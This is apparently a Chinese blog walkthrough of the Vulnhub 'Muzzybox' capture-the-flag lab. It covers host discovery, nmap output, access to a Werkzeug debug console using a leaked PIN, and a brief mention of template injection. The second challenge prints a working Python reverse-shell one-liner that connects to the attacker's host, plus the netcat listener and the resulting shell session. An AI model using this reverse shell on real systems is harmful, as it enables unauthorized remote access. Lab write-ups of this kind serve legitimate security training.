标签：25 http 192.168 2020 Vulnhub Feb 靶机 Muzzybox webpy

Muzzybox

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:ff:33:41      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.242  08:00:27:6c:2c:5b      1      60  PCS Systemtechnik GmbH

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.242

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.242 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-03 22:06 EDT
Nmap scan report for bogon (192.168.56.242)
Host is up (0.00015s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:3c:05:11:e0:2a:5a:34:bf:95:4c:59:0e:86:81:4f (RSA)
|   256 a7:65:d3:5b:e7:9d:56:ad:e4:a9:87:d9:2d:ae:3a:c3 (ECDSA)
|_  256 d5:7e:21:b6:3f:f3:24:7a:2f:b7:b6:6e:59:43:dd:73 (ED25519)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.17)
|_http-title: Directory listing for /
3000/tcp  open  http    Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: Muzzy CTF
|_http-server-header: Werkzeug/1.0.0 Python/3.6.9
8989/tcp  open  http    Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: TypeError: The view function did not return a valid response. ...
|_http-server-header: Werkzeug/1.0.0 Python/3.6.9
9633/tcp  open  http    SimpleHTTPServer 0.6 (Python 2.7.17)
|_http-title: Directory listing for /
15000/tcp open  http    Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: 404 Not Found
MAC Address: 08:00:27:6C:2C:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds

挑战一

访问80端口，访问该靶机的使用指南：

In addition, you can use this id card for reference. Click_Here OR got to http://{ip}:9633/idcard.png Note: Don't upload this file directly, edit with your name and upload it's screenshot.

将图片下载到Kali Linux本地

http://192.168.56.242:9633/idcard.png

然后需要修改图片，用画图工具修改，由于作者给的提示只有principal才是授权的，因此需要将student改成principal

然后在192.168.56.242:3000进行上传

挑战二

After the data breach University has developed the new website, but somehow it is still under maintenance. Can you able to list the current directory and read the flag file.
Link: http://{IP}:8989/

访问8989端口，却发现报错，不过在错误的右后方，可以点击，弹出窗口：

而这里的PIN就是挑战一的数字123456789，然后就出现了python的运行环境

首先在Kali Linux上启动nc侦听

然后在靶机的python console中执行：

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.230",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

这样在Kali Linux上得到了靶机返回的Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.242] 58360
192.168.56.230 - - [04/Apr/2023 08:06:18] "GET /?__debugger__=yes&cmd=os.dup2(s.fileno()%2C2)&frm=140383158195424&s=8ywYwr8xuss2AXZJi1Os HTTP/1.1" 200 -
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
webpy@muzzy:~$ ls -alh
ls -alh
total 32K
drwx------ 4 webpy webpy 4.0K Feb 25  2020 .
drwxr-xr-x 7 root  root  4.0K Feb 25  2020 ..
-rwx------ 1 webpy webpy  381 Feb 25  2020 .bash_history
-rwx------ 1 webpy webpy 3.7K Feb 25  2020 .bashrc
drwx------ 2 webpy webpy 4.0K Feb 25  2020 flag
drwx------ 3 webpy webpy 4.0K Feb 25  2020 .local
-rwx------ 1 webpy webpy  807 Feb 25  2020 .profile
-rwx------ 1 webpy webpy   66 Feb 25  2020 .selected_editor
webpy@muzzy:~$ cd flag
cd flag
webpy@muzzy:~/flag$ ls -alh
ls -alh
total 12K
drwx------ 2 webpy webpy 4.0K Feb 25  2020 .
drwx------ 4 webpy webpy 4.0K Feb 25  2020 ..
-rwx------ 1 webpy webpy  490 Feb 25  2020 ctf2.py
webpy@muzzy:~/flag$ cat ctf2.py
cat ctf2.py
import os
from flask import Flask
app = Flask(__name__)
@app.route('/')
def aws_console():
        print("Welcome to the Muzzy's World")
if __name__ == '__main__':
    # os.environ['WERKZEUG_DEBUG_PIN'] = 'off'
    # os.environ.set('WERKZEUG_DEBUG_PIN') = 'Muzzy'
    # app.secret_key = '123-456-789'
    os.environ['WERKZEUG_DEBUG_PIN'] = '123-456-789'
    app.config['FLAG'] = 'N$cTF{R34D_F!L3_/home/webssti/noflag.txt}'
    app.run(host='0.0.0.0', port=8989, debug=True, threaded=True)

这样就得到了第2个flag

N$cTF{R34D_F!L3_/home/webssti/noflag.txt}

挑战三

http://192.168.56.242:15000/page?name=jason

我们提交不同的name值时，页面返回相同值的内容，因此这个端口存在模板注入漏洞

可以利用tqlmap工具

标签：25,http,192.168,2020,Vulnhub,Feb,靶机,Muzzybox,webpy
From： https://www.cnblogs.com/jason-huawen/p/17285797.html

Vulnhub之Muzzybox靶机详细测试过程

Muzzybox

识别目标主机IP地址

NMAP扫描

挑战一

挑战二

挑战三

相关文章

赞助商

阅读排行